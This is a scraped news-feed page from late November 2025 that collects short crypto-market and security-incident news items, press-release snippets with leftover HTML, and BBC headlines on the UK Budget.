The financial services giant has filed with the US Securities and Exchange Commission to launch a leveraged BTC financial product.

Members of the Bitcoin community and supporters of Strategy, the largest corporate holder of BTC, are criticizing JPMorgan’s proposed Bitcoin-backed notes, accusing the bank of spreading fear, uncertainty and doubt about Strategy and other crypto treasury firms.

JPMorgan’s notes are a leveraged investment product tied to the price of Bitcoin (BTC). The product tracks BTC but amplifies the outcome, giving holders 1.5 times the gains — or the losses — through December 2028. The notes are slated for a December 2025 launch, according to an SEC filing

The move drew sharp criticism from the Bitcoin community, with many saying that JPMorgan is now a direct competitor to BTC treasury companies and has an incentive to marginalize companies like Strategy to promote its own structured financial product.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 21:54:20 +0000

Amundi brings euro money market fund onchain with first tokenized share

The asset manager’s hybrid rollout enables investors to choose between the traditional fund and a new blockchain-based version recorded on Ethereum.

Amundi, Europe’s largest asset manager, has introduced its first tokenized share class for a euro money market fund.

The fund is now offered in a hybrid structure, allowing investors to choose between the traditional version and the new blockchain-based one. The first transaction was recorded on the Ethereum network on Nov. 4.

The rollout was developed in collaboration with CACEIS, a European asset-servicing group that provided the tokenization infrastructure, investor wallets, and the digital order system used to process subscriptions and redemptions.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 20:23:33 +0000

ETH traders ramp up positioning, setting a price target at $3.4K

Ethereum traders ramped up leverage as futures dominance surged and key technical levels came into play. Will ETH bulls succeed in catalyzing a rally to $3,400?

Ethereum (ETH) traders are quietly rotating back into leverage, with fresh futures data signaling a major shift in market positioning as ETH approaches a critical technical zone.

Key takeaways:

Ether leads all major crypto assets in the futures-to-spot ratio, with the current rating at 6.84.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 20:04:43 +0000

Bitcoin trades above $90K: Here’s what bulls must do to extend the rally

Bitcoin bulls need to pump more volume into the spot and futures market in order for the current BTC bounce to hold above $90,000.

Bitcoin (BTC) reclaimed $90,000 this week, but onchain data indicated that the move sat on shaky grounds. Despite a strong cost-basis cluster, demand, liquidity, and futures activity remained thin.

Key takeaways:

The $84,000 cost-basis cluster held 400,000 BTC, but spot demand above it remains shallow.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 19:00:40 +0000

Balancer community proposes plan to distribute funds recovered from hack

The proposal details how roughly $8 million recovered from the $116 million November hack would be distributed to victims.

Two members of the Balancer protocol community submitted a proposal on Thursday outlining a distribution plan for a portion of the funds recovered from the protocol’s $116 million November exploit.

About $28 million from the $116 million heist was recovered by white hat hackers, internal rescuers, and StakeWise — an Ether liquid staking platform. 

However, the proposal covers only the $8 million recovered by white hat hackers and internal rescue teams, while the nearly $20 million retrieved by StakeWise will be distributed separately to its users.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 18:26:26 +0000

BONK memecoin debuts as ETP on Switzerland’s SIX exchange

The listing brings the Solana-based token into one of Europe’s largest stock markets, even as memecoin valuations continue to slide in 2025.

Solana-based memecoin Bonk is now trading on Switzerland’s SIX Swiss Exchange after Bitcoin Capital listed a regulated exchange-traded product (ETP) tied to the token. 

The listing brings the memecoin into one of Europe’s largest stock markets, allowing investors to gain exposure to Bonk (BONK) through standard brokerage accounts, removing the need for wallets or direct token custody. 

BONK is a dog-themed memecoin on Solana that launched on Christmas Day 2022 through a community airdrop. It brands itself as “the first Solana dog coin for the people, by the people.”

Read more

Article link

Date of publish: Thu, 27 Nov 2025 17:44:26 +0000

Bitcoin has a 75% chance of short-term rally, says trader Alessio Rastani

Veteran trader Alessio Rastani breaks down his bullish outlook for Bitcoin in the coming months in a new Cointelegraph interview.

With Bitcoin sliding from its recent all-time high and market sentiment sinking into extreme fear, many investors are convinced the bull run is over. While social media is filled with predictions of a deep bear market and analysts claiming the next true bottom won’t arrive until 2026, trader Alessio Rastani sees a different picture.

In an interview with Cointelegraph, Rastani explains why the recent drop may not signal the start of a prolonged bear cycle. Instead, he argues that the data points to a historically recurring setup that has preceded strong rallies roughly 75% of the time.

According to Rastani’s charts, this setup has appeared after several past death cross events, the same pattern that many traders wrongly interpret as a bearish omen.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 17:13:36 +0000

Trump-linked ALT5 Sigma shakes up leadership amid WLFI scrutiny

The crypto treasury firm, which holds Trump-linked World Liberty Financial (WLFI) tokens on its balance sheet, has replaced two senior executives.

ALT5 Sigma, a crypto treasury company with ties to US President Donald Trump, replaced CEO Jonathan Hugh and cut ties with chief operating officer Ron Pitters in November as part of a broader leadership overhaul.

Tony Isaac, the president of ALT5 Sigma and a member of the company’s board of directors, has been appointed as acting CEO, while the company works with Hugh to “finalize the terms of his departure,” according to a Securities and Exchange Commission (SEC) filing submitted on Wednesday. 

ALT5 Sigma’s crypto treasury strategy includes purchasing tokens from World Liberty Financial (WLFI), a decentralized finance platform tied to the Trump family.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 16:40:43 +0000

Solana analysis: SOL price unlikely to break $150 for now

Solana struggles with recovery due to weakening network activity, a declining TVL, and negative ETF flows, as a classic chart pattern targets $100.

SOL’s (SOL) recent recovery stalled at $145 as Solana ETF flows flipped negative for the first time since launch.

Key takeaways:

Solana TVL drops 20% in November, with a 16% decline in network fees, signaling weak network demand.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 16:22:44 +0000

What’s behind the surge in privacy tokens as the rest of the market weakens?

Zcash and other privacy tokens are rallying against a weaker market as regulatory pressure, delistings and AML rules reshape this niche sector.

Privacy tokens, such as Zcash, have posted gains, while the overall crypto market cap and Bitcoin have dropped sharply.

The rally is happening against a tightening policy backdrop with FATF pressure, new EU AML rules and a growing list of privacy coin delistings.

Sanctions cases and prosecutions involving mixers and wallets have raised questions about the line between infrastructure and money transmission, pushing compliance teams toward cautious de-risking.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 16:03:12 +0000

Bitcoin sees ‘significant step forward’ as $97K BTC price targets return

Bitcoin gained fresh bullish BTC price targets closer to $100,000 on the back of a sustained rebound and encouraging futures market signals.

Bitcoin (BTC) avoided US selling pressure Thursday as US Thanksgiving provided bulls with key relief. 

Key points:

Bitcoin retains $90,000 as support into the Thanksgiving weekend after hitting weekly highs.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 15:38:42 +0000

Fiat inflation drives crypto adoption across the globe

Global inflation has slowed down, but in many countries, crypto is still providing an attractive and viable alternative to the local monetary system.

Countries around the world are grappling with inflation, and in many places, investors and everyday savers are turning to crypto to protect their savings.

The early 2020s saw a sharp uptick in global inflation rates amid government stimulus programs during the COVID-19 epidemic. Supply chain disruptions led to increased costs for businesses, and food and energy prices rose following Russia’s war in Ukraine.

Central banks responded aggressively, hiking interest rates and easing pressure on supply chains. As a result, inflation rates have somewhat calmed in the last two years.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 14:52:27 +0000

Houdini Pay targets freelancers with privacy-focused crypto payment tool

Houdini Swap launched Houdini Pay, a payment service that breaks onchain links between counterparties, offering surface-level privacy.

Centralized instant exchange aggregator Houdini Swap has rolled out a private payment service allowing users to receive payments in their preferred asset without revealing their onchain address.

According to an announcement shared with Cointelegraph, Houdini Pay allows users to generate shareable payment links with support for over 4,000 digital assets across multiple blockchains. The asset is converted to the receiver’s preferred asset, and routing the payment through the system breaks the onchain link between the sender and the receiver, preventing one from snooping on the other’s wallet.

The fees incurred for using the service are those for using the Houdini Swap instant exchange aggregator on the back end and are covered by the sender. The recipient receives the full requested amount.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 14:33:18 +0000

Malicious Chrome extension skims Solana swaps with hidden extra transfers

A malicious Chrome extension called Crypto Copilot lets users trade Solana directly from X but secretly skims a small portion of the transaction.

A malicious Google Chrome browser extension is letting users trade on Solana, while quietly skimming a fee from every swap into the creator’s wallet.

According to a Tuesday report by cybersecurity company Socket, the Google Chrome extension allows users to trade on Solana (SOL) from their X social media feed. Unlike typical wallet-draining malware that tries to steal the entire balance, Crypto Copilot “injects an extra transfer into every Solana swap, siphoning a minimum of 0.0013 SOL or 0.05% of the trade,” Socket found.

On the back end, Crypto Copilot uses the decentralized exchange Raydium to perform swaps for the user, but appends a second instruction that transfers SOL from the user to the attacker. The user interface only shows the swap details while wallet confirmation screens “summarize the transaction without surfacing individual instructions.”

Read more

Article link

Date of publish: Thu, 27 Nov 2025 14:07:24 +0000

How blockchain upgrades start: From idea to proposal

CTDG Dev Hub’s upgrade pipeline turns raw ideas into tested code, formal proposals and transparent governance across networks.

Blockchains do not stand still. Fee markets shift, validator sets evolve, and new modules arrive to handle everything from privacy to crosschain messaging. Behind each of those changes sits a simple starting point: an idea that someone cared enough to write down.

Cointelegraph Decentralization Guardians (CTDG) was created to give those ideas a more reliable home. The initiative runs high-performance validators and participates in governance across networks such as Solana,, Injective, Chiliz, Polkadot, Coreum, Canton and Mantra, contributing to decentralization and security at the protocol layer.

The CTDG Dev Hub, launched in collaboration with blockchain infrastructure provider Boosty Labs, extends the work to the development process itself. It serves as a public coordination space where contributors can submit, discuss and track upgrade proposals instead of relying on fragmented chats or closed documentation.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 13:42:00 +0000

Solana ETFs end perfect run as 21Shares’ TSOL sees $34M in outflows

The reversal was driven by the 21Shares Solana ETF (TSOL), which saw over $34 million in withdrawals in a single day.

US spot Solana exchange-traded funds (ETFs) broke their flawless inflow streak on Wednesday, recording $8.1 million in net outflows, their first day in the red since launch, according to ETF data provider SoSoValue. 

A single ETF product largely drove the pullback, the 21Shares Solana ETF (TSOL), which experienced over $34 million in outflows. The ETF has recorded cumulative net outflows of $26 million since launch and has net assets of $86 million.

The rest of the SOL ETFs performed well, absorbing much of the outflows by TSOL. The Bitwise Solana Staking ETF (BSOL) continued to dominate with a $13.33 million single-day intake, lifting its cumulative inflows to $527.79 million

Read more

Article link

Date of publish: Thu, 27 Nov 2025 13:40:35 +0000

Visa doubles down on stablecoins in Europe, Middle East, Africa with new partnership

Visa has partnered with crypto infrastructure company Aquanow to expand stablecoin settlement across the CEMEA region, cutting cross-border costs and friction.

Visa is expanding its use of stablecoins for settlement in Central and Eastern Europe, the Middle East and Africa (CEMEA) through a new partnership with crypto infrastructure company Aquanow.

In an announcement Thursday, Visa said it partnered with Aquanow “to settle transactions using approved stablecoins such as USDC, reducing costs, operational friction, and settlement times.” The company said the move came amid strong demand from banks and payment companies for faster, cheaper cross-border payments.

The move aims to leverage stablecoins to digitize the back end of money movement and to enable 24/7 settlement. Godfrey Sullivan, Visa’s head of product and solutions for the CEMEA region, said the integration will allow institutions in the region “to experience faster and simpler settlements.”

Read more

Article link

Date of publish: Thu, 27 Nov 2025 13:34:05 +0000

BlackRock ETF investors bounce back to profit as price reclaims $90K

BlackRock Bitcoin ETF investors are back in profit, in a promising sign of a December market recovery from the cohort that drove much of Bitcoin’s rise to all-time highs in 2025.

BlackRock’s spot Bitcoin exchange-traded fund (ETF) holders are back in profit after Bitcoin’s recovery above $90,000, an early sign that sentiment may be turning among one of the key investor groups driving the market this year.

The holders of the largest spot Bitcoin (BTC) fund, BlackRock’s iShares Bitcoin Trust ETF (IBIT), bounced back to a cumulative profit of $3.2 billion on Wednesday, according to blockchain data platform Arkham.

“BlackRock IBIT and ETHA holders went from being up almost a combined $40 billion at their PnL peak on 7th October, down to $630 million 4 days ago,” wrote Arkham in a Wednesday X post. “This means the average of all BlackRock ETF buys is at just about break-even.”

Read more

Article link

Date of publish: Thu, 27 Nov 2025 13:16:45 +0000

Ethereum raises block gas limit to 60M as network capacity climbs ahead of Fusaka

Ethereum co-founder Vitalik Buterin said he expects growth to continue next year, but with smarter adjustments that expand capacity without new bottlenecks.

Ethereum crossed a threshold in execution capacity as its mainnet block gas limit reached 60 million, the highest level the network has seen in four years. 

Data tracker Gas Limit Pics showed that in November, over 513,000 validators signaled a 60 million gas limit, pushing the Ethereum network over the threshold needed for the protocol to begin moving the gas limit upward.  

A higher gas limit allows Ethereum to fit more work into each block, including swaps, token transfers and smart contract calls. In practice, that can ease congestion during busy periods and help the network process more activity at the base layer.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 11:59:55 +0000

Europe’s new chat police: Chat Control legislation nudges forward in the EU

EU governments agree to push forward with child sexual abuse Chat Control rules, but a compromise keeps voluntary scanning alive, leaving privacy advocates fuming.

Representatives of European Union member states reached an agreement on Wednesday in the Council of the EU to move forward with the controversial “Chat Control” child sexual abuse regulation, which paves the way for new rules targeting abusive child sexual abuse material (CSAM) on messaging apps and other online services.

“Every year, millions of files are shared that depict the sexual abuse of children… This is completely unacceptable. Therefore, I’m glad that the member states have finally agreed on a way forward that includes a number of obligations for providers of communication services,” said Danish Minister for Justice, Peter Hummelgaard.

The deal, which follows years of division and deadlock among member states and privacy groups, allows the legislative file to move into final talks with the European Parliament on when and how platforms can be required to scan user content for suspected child sexual abuse and grooming.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 11:22:58 +0000

Bitcoin bounces to seven-day highs, but can BTC break $95K on Thanksgiving?

Bitcoin remained below key support levels as traders hoped the rally could achieve the highest-ever Thanksgiving Day close for BTC price.


Bitcoin (BTC) rallied 13% from multimonth lows at $80,000, reclaiming the $90,000 mark on Wednesday. This move came as a surprise as BTC staged a pre-holiday rally, increasing hopes of a continued upward move going into Thanksgiving weekend.

Key takeaways:

Bitcoin stages a pre-Thanksgiving rally and seeks to defy its historical average return of -0.8% during the holiday. 

Read more

Article link

Date of publish: Thu, 27 Nov 2025 11:12:45 +0000

Do Kwon says five-year US sentence is enough as he faces 40 years in South Korea

Terraform Labs co-founder Do Kwon asked a US court to limit his prison term to five years as he faces a separate case in South Korea.

Terraform Labs co-founder Do Kwon asked a US judge to cap his prison time at five years for his role in the collapse of the Terra ecosystem, which erased about $40 billion from crypto markets in 2022.

In a court filing on Wednesday, Kwon argued that a longer term would be excessive given the punishment he has already served and the penalties he has agreed to accept, according to Bloomberg.

Kwon pleaded guilty in August to two counts of wire fraud and conspiracy to defraud after being extradited from Montenegro, where he had been detained. His lawyers said he had spent almost three years behind bars, “with more than half that time in brutal conditions in Montenegro,” and that he had already paid a heavy personal and financial price.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 10:55:52 +0000

Cathie Wood says ARK’s $1.5M Bitcoin bull price hasn’t changed as markets eye rally

ARK Invest expects another $300 billion in liquidity to return after the government shutdown, a development that may alleviate the “liquidity squeeze” affecting crypto and AI valuations.

Equities and cryptocurrency markets may be setting up for a year-end reversal as liquidity improves and US monetary policy turns more supportive following the end of the record government shutdown.

Improving market conditions will be driven by the increasing liquidity, which has already returned $70 billion into markets since the end of the US government shutdown, with another $300 billion expected to return over the next five to six weeks as the Treasury General Account normalizes, according to investment management company ARK Invest.

Another potential catalyst will arrive on Dec. 1, when the US Federal Reserve is scheduled to end its quantitative tightening program and pivot toward quantitative easing, a shift that involves bond-buying to lower borrowing costs and stimulate economic activity.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 09:46:59 +0000

Upbit hit with $36M Solana hot wallet breach day after $10B Naver deal

The breach occurred as Upbit’s parent company, Dunamu, sealed a $10 billion acquisition deal with Naver and plans an initial public offering in the US.

Update Nov. 27, 9:23 am UTC: This article has been updated to include comments from Trezor CEO Matej Zak.

South Korea’s biggest crypto exchange, Upbit, temporarily froze deposits and withdrawals on Thursday after detecting about $36 million in unauthorized outflows from a Solana-network hot wallet. 

In an announcement, the exchange said the suspicious transfers were flagged around 4:42 am local time (7:42 pm UTC), prompting a shutdown of transfer services and a full security review of its supported crypto assets. 

Read more

Article link

Date of publish: Thu, 27 Nov 2025 08:52:10 +0000

Abu Dhabi regulator approves Ripple’s RLUSD stablecoin for institutional use

Ripple’s dollar-backed stablecoin secures a major regulatory win as Abu Dhabi allows licensed firms to use RLUSD inside its international financial center.

Ripple’s dollar-pegged stablecoin was cleared for use by institutions in Abu Dhabi after winning recognition as an Accepted Fiat-Referenced Token by the local watchdog.

In a Thursday announcement, Ripple said the approval allows regulated firms to deploy Ripple USD (RLUSD) inside the Abu Dhabi Global Market’s (ADGM) financial zone,  an international financial center and free zone located on Al Maryah and Al Reem Islands in Abu Dhabi.

“With a market capitalization of over $1 billion and growing adoption in core financial uses like collateral and payments, RLUSD is quickly becoming a go-to USD stablecoin for major institutions,” said Jack McDonald, senior vice president of stablecoins at Ripple.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 08:11:36 +0000

Buterin donates to 2 projects pushing ‘next steps’ of digital privacy

Ethereum co-founder Vitalik Buterin has just donated over $760,000 in Ether to two projects he says are pushing digital privacy forward.

Ethereum co-founder Vitalik Buterin has disclosed a donation of approximately $760,000 in Ether to two crypto messaging apps that he views as pushing the boundaries of digital privacy. 

Encrypted messaging apps, like Signal, are “important for preserving our digital privacy,” Buterin said in an X post on Wednesday, adding the next steps for the space should be permissionless account creation and metadata privacy.

Decentralized messaging apps Session and SimpleX Chat are “pushing these directions forward,” Buterin said, adding that he “donated 128 ETH to each” and encouraged users to try them. 

Read more

Article link

Date of publish: Thu, 27 Nov 2025 06:13:19 +0000

Australia moves forward with bill to regulate crypto under finance laws

Australia has taken another step to introduce legislation that will subject crypto platforms to the same laws and licensing obligations as financial institutions.

Australia’s government has introduced a new bill that will regulate crypto platforms under existing financial services laws after an industry consultation saw cautious support for the legislation.

Assistant Treasurer Daniel Mulino introduced the Corporations Amendment (Digital Assets Framework) Bill 2025 on Wednesday, which would require crypto companies such as exchanges and custody providers to obtain an Australian Financial Services License (AFSL).

“Across the world, digital assets are reshaping finance,” Mulino told the House on Wednesday. “Australia must keep pace. If we get this right, we can attract investment, create jobs and position our financial system as a leader in innovation.”

Read more

Article link

Date of publish: Thu, 27 Nov 2025 06:00:57 +0000

XRP ETFs absorb 80M tokens: Is a new bull trend starting for the altcoin?

Two new XRP ETFs absorbed 80 million tokens on launch as the price formed a bullish flag after hitting resistance at $2.20.

XRP’s (XRP) newly launched exchange-traded funds (ETFs) absorbed nearly 80 million tokens on Monday, sharply outperforming Solana’s recent ETF debut. The rapid inflows have pushed total assets under management (AUM) to $778 million, according to data from XRP Insights.

Key takeaways:

Grayscale and Franklin Templeton’s XRP ETFs absorbed nearly $130 million on product launch.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 05:20:07 +0000

News Ticker - markets.businessinsider.com

GENFIT Announces Appointment of new Chief Medical Officer

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="justify"><b>Lille (France), Cambridge (Massachusetts, United States), Zurich (Switzerland), November 27, 2025</b> - <b>GENFIT (Euronext: GNFT)</b>, a biopharmaceutical company dedicated to improving the lives of patients with rare and...

Article link

Date of publish: Thu, 27 Nov 2025 17:00:00 GMT

XBULL Exchange Launches Next-Generation Smart Execution Engine to Enhance Institutional-Grade Trading Performance

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />Denver, CO, Nov. 27, 2025 (GLOBE NEWSWIRE) -- XBULL Exchange unveiled its upgraded Smart Execution Engine, marking a new phase in the platform’s commitment to performance-driven innovation and high-precision digital-asset trading. The new engine...

Article link

Date of publish: Thu, 27 Nov 2025 17:00:00 GMT

Collect&Exchange SaaS Announces New Platform Update Focused on Stability, Performance, and Operational Efficiency

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p id="isPasted">Limassol, Cyprus, Nov. 27, 2025 (GLOBE NEWSWIRE) -- Collect Group announces a new update to its CollectExchange SaaS platform — the white-label solution that enables companies to launch crypto exchange and OTC operations in a...

Article link

Date of publish: Thu, 27 Nov 2025 17:00:00 GMT

MCI Taps FEMA/DHS Veteran Executive Mark Misczak as President; Spins Out Tier-5 AiCX.com Division

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />MANALAPAN, Fla., Nov. 27, 2025 (GLOBE NEWSWIRE) -- <a href="https://www.globenewswire.com/Tracker?data=8efIS3568opjn3zm6GIx3GOcKZ0lAgBv8TpFvuQR-fKVmXEN6EBiHBa2wYNnaxF6V-euyGvcGjtV5_K0S1dFTw==" rel="nofollow" target="_blank">MCI</a> announced the...

Article link

Date of publish: Thu, 27 Nov 2025 17:00:00 GMT

XT Exchange Unveils 2026 Growth Roadmap as COO Tracy Jin Outlines Strategy for a Trust-Driven Future

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />VICTORIA, Seychelles, Nov. 27, 2025 (GLOBE NEWSWIRE) -- XT Exchange has announced its 2026 Growth Roadmap, highlighting new liquidity initiatives, expanded Earn products, and upcoming AI-powered trading tools. According to Chief Operating Officer...

Article link

Date of publish: Thu, 27 Nov 2025 16:56:59 GMT

EQS-News: CPI Europe publishes unaudited financial results for the first three quarters of 2025

<table border="0"><tr><td> EQS-News: CPI Europe AG / Key word(s): Quarter Results/Real Estate <br/> CPI Europe publishes unaudited financial results for the first three quarters of 2025 <br/><br/> 27.11.2025 / 17:47 CET/CEST<br/> The issuer is solely responsible for the content of this announcement.<br/><br/><!

Article link

Date of publish: Thu, 27 Nov 2025 16:47:23 GMT

EQS-PVR: flatexDEGIRO AG: Release according to Article 40, Section 1 of the WpHG [the German Securities Trading Act] with the objective of Europe-wide distribution

<table border="0"><tr><td> EQS Voting Rights Announcement: flatexDEGIRO AG <br/> flatexDEGIRO AG: Release according to Article 40, Section 1 of the WpHG [the German Securities Trading Act] with the objective of Europe-wide distribution <br/><br/> 27.11.2025 / 17:45 CET/CEST<br/> Dissemination of a Voting Rights...

Article link

Date of publish: Thu, 27 Nov 2025 16:45:03 GMT

EQS-PVR: flatexDEGIRO AG: Release according to Article 40, Section 1 of the WpHG [the German Securities Trading Act] with the objective of Europe-wide distribution

<table border="0"><tr><td> EQS Voting Rights Announcement: flatexDEGIRO AG <br/> flatexDEGIRO AG: Release according to Article 40, Section 1 of the WpHG [the German Securities Trading Act] with the objective of Europe-wide distribution <br/><br/> 27.11.2025 / 17:45 CET/CEST<br/> Dissemination of a Voting Rights...

Article link

Date of publish: Thu, 27 Nov 2025 16:45:03 GMT

Westhaven Appoints Gattens as Vice President, Communications

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="justify">VANCOUVER, British Columbia, Nov. 27, 2025 (GLOBE NEWSWIRE) -- Westhaven Gold Corp. (TSX-V: WHN) ( "Westhaven " or the "Company ") is pleased to announce the appointment of Ms. Kaeli Gattens as Vice President, Communications,...

Article link

Date of publish: Thu, 27 Nov 2025 16:19:43 GMT

ROSEN, A LEADING INVESTOR RIGHTS LAW FIRM, Encourages America's Car-Mart, Inc. Investors to Inquire About Securities Class Action Investigation - CRMT

<img src="https://api.newsfilecorp.com/newsinfo/275966/208" id="208" width="2" height="2" style="width: 1px; height: 1px;border: 0px solid;">New York, New York--(Newsfile Corp. - November 27, 2025) - <b>WHY: </b>Rosen Law Firm, a global investor rights law firm, continues to investigate potential securities claims on behalf of shareholders of...

Article link

Date of publish: Thu, 27 Nov 2025 16:11:00 GMT

BBC News

Households face 'dismal' rise in spending power, says IFS

Average disposable income is set to grow by "only" 0.5% annually over the next five years, the think tank says.

Article link

Date of publish: Thu, 27 Nov 2025 16:35:50 GMT

Labour ditches day-one protection from unfair dismissal in U-turn

The right will now be introduced after six months, in a breach of Labour's election manifesto.

Article link

Date of publish: Thu, 27 Nov 2025 22:09:54 GMT

How will the changes to workers' rights affect you?

A major shake-up of workers' rights is on its way, but what impact will it have?

Article link

Date of publish: Thu, 27 Nov 2025 18:14:53 GMT

Simon Jack: Businesses left asking - what happened to growth?

Significant pro-business measures were thin on the ground in this year's Budget.

Article link

Date of publish: Thu, 27 Nov 2025 15:27:37 GMT

Who are the winners and losers from Rachel Reeves' Budget?

BBC Verify has examined what we know about how the Budget is likely to financially affect different groups.

Article link

Date of publish: Thu, 27 Nov 2025 18:23:07 GMT

Nine ways the Budget could affect you if you're under 25

The chancellor's Budget contained a slew of measures which will impact young people specifically.

Article link

Date of publish: Thu, 27 Nov 2025 12:10:34 GMT

Isas, cars and pensions: How the Budget affects you

The Budget delivered by Chancellor Rachel Reeves will affect you and your finances. Here's how.

Article link

Date of publish: Wed, 26 Nov 2025 13:57:21 GMT

Faisal Islam: The real reason Reeves is making you pay more tax

This is about buying breathing space, politically and economically. The two factors are now inseparable.

Article link

Date of publish: Wed, 26 Nov 2025 18:42:24 GMT

OBR calls in cyber expert over botched release of Budget analysis

Rachel Reeves's statement was thrown into chaos after journalists were able to access the document early.

Article link

Date of publish: Thu, 27 Nov 2025 13:19:51 GMT

Banking giant to build £10bn tower at Canary Wharf

One of the world's largest banking firms announces plans to build a new HQ "bigger than the Shard".

Article link

Date of publish: Thu, 27 Nov 2025 15:49:28 GMT

'I earn £20,000 and live with my son. The Budget means we will pay more tax'

BBC News hears from people with a range of incomes about what they think of the Budget.

Article link

Date of publish: Thu, 27 Nov 2025 11:38:39 GMT

No changes to Scottish income tax plan, Robison says

The finance secretary says rates will not rise and no new bands will be introduced in January's Budget.

Article link

Date of publish: Thu, 27 Nov 2025 12:53:34 GMT

Classic Morris van to get 21st Century all-electric makeover

An all-electric version of the classic van, a familiar sight in the 1950s, is to go into production.

Article link

Date of publish: Thu, 27 Nov 2025 13:09:22 GMT

Asahi says 1.5 million customers' data potentially leaked in cyber-attack

The ransomware attack in September crippled Asahi's Japan operations and caused a drinks shortage.

Article link

Date of publish: Thu, 27 Nov 2025 03:41:46 GMT

How the chancellor just took a chunk out of your future pay

The point at which you start to pay tax, and the point where you tip into paying a higher rate of tax have been frozen for three more years.

Article link

Date of publish: Wed, 26 Nov 2025 17:21:13 GMT

Budget 2025: Key points at a glance

Changes to tax, pensions and welfare - here’s what you need to know from Rachel Reevesher second Budget.

Article link

Date of publish: Wed, 26 Nov 2025 19:35:05 GMT

Salary sacrifice tax break cut on workplace pensions

Some pension savers face a hit to the amount of money they can put into their pension without paying national insurance.

Article link

Date of publish: Wed, 26 Nov 2025 18:46:21 GMT

Electric vehicle owners to face pay-per-mile tax

Drivers of electric cars will pay a road charge of 3p per mile, while plug-in hybrid drivers will pay 1.5p per mile from April 2028.

Article link

Date of publish: Wed, 26 Nov 2025 18:10:54 GMT

UK growth forecasts lowered from next year

Downgrades to productivity means the economy is set to grow at an annual rate of 1.5% on average over the next five years.

Article link

Date of publish: Wed, 26 Nov 2025 17:07:16 GMT

Properties worth more than £2m in England face mansion tax

The surcharge begins at £2,500, rising to £7,500 for properties valued at more than £5m.

Article link

Date of publish: Thu, 27 Nov 2025 09:54:06 GMT

Asahi says 1.5 million customers' data potentially leaked in cyber-attack

The ransomware attack in September crippled Asahi's Japan operations and caused a drinks shortage.

Article link

Date of publish: Thu, 27 Nov 2025 03:41:46 GMT

Warner settles lawsuit with AI music firm and launches joint venture

The label is going into business with tech start-up Suno after settling a lawsuit against the company.

Article link

Date of publish: Wed, 26 Nov 2025 07:21:31 GMT

Over 21s to get £12.71 an hour in minimum wage rise

The move has been welcomed, but some experts say it will not cover the current cost of living.

Article link

Date of publish: Tue, 25 Nov 2025 18:54:42 GMT

More North Sea drilling to be allowed in new Labour plan

The chancellor will unveil the North Sea Strategy in her Budget speech, the BBC understands.

Article link

Date of publish: Wed, 26 Nov 2025 10:32:26 GMT

'This is the first year I can't find a holiday job'

Seasonal hiring is poised to drop to its lowest level since 2008, a sign of caution among US businesses in the face of tariffs and consumer angst.

Article link

Date of publish: Wed, 26 Nov 2025 06:07:43 GMT

How much are minimum wages set to rise?

Three and a half million low-paid workers across the UK benefit from minimum wage rates.

Article link

Date of publish: Tue, 25 Nov 2025 18:00:16 GMT

Milkshakes and lattes to face sugar tax in UK

The tax on sugary drinks is being extended to include pre-packaged milk-based drinks.

Article link

Date of publish: Tue, 25 Nov 2025 14:54:58 GMT

Fracking has transformed an Argentine town but what about the nation?

Argentina hopes that an oil and gas boom can benefit the whole country.

Article link

Date of publish: Thu, 27 Nov 2025 00:02:47 GMT

The entrepreneur connecting tourists to African hospitality

TripZapp founder Rory Okoli wants to make it simple for tourists to book and pay for African travel.

Article link

Date of publish: Tue, 25 Nov 2025 00:02:30 GMT

Machu Picchu hit by a row over tourist buses

Protests have taken place over the coaches that take visitors up to the world heritage site in Peru.

Article link

Date of publish: Mon, 24 Nov 2025 00:06:53 GMT

The 'toughest crop': Can tech help cardamom farmers?

Sensitive to the weather and soil cardamom is difficult to cultivate - can tech help?

Article link

Date of publish: Fri, 21 Nov 2025 00:01:09 GMT

From florist to drone maker: How the weapon became so mainstream

With drones centre stage in Ukraine, military firms around the globe are ramping up their production.

Article link

Date of publish: Fri, 14 Nov 2025 22:24:18 GMT

Will AI mean better adverts or 'creepy slop'?

Advertisers are using AI to personalise adverts but not everyone agrees that's a good idea.

Article link

Date of publish: Tue, 18 Nov 2025 14:48:29 GMT

The Kenyan start-up aiming to electrify African transport

From fleets of e-bikes to individual riders, eWaka aims to sell across Africa's delivery market.

Article link

Date of publish: Tue, 11 Nov 2025 00:03:14 GMT

Fire-blocking chemicals promise safer buildings

New treatments promise to make buildings fire-resistant without using older, toxic chemicals.

Article link

Date of publish: Fri, 07 Nov 2025 00:13:36 GMT

Will quantum be bigger than AI?

The highly complex technology is increasingly being tipped to transform computing.

Article link

Date of publish: Thu, 06 Nov 2025 00:10:59 GMT

The start-up creating science kits for young Africans

Stemaide's goal is to bring tech skills to young Africans and prepare them for future jobs.

Article link

Date of publish: Tue, 04 Nov 2025 00:13:20 GMT

'This is the big one' - tech firms bet on electrifying rail

Railway operators have new options for electric trains including getting rid of locomotives altogether.

Article link

Date of publish: Fri, 31 Oct 2025 00:14:09 GMT

How do Surrey businesses feel about the Budget?

Businesses in Surrey give mixed reactions to Chancellor Rachel Reeves' Budget.

Article link

Date of publish: Thu, 27 Nov 2025 15:37:17 GMT

What is happening to gas and electricity prices?

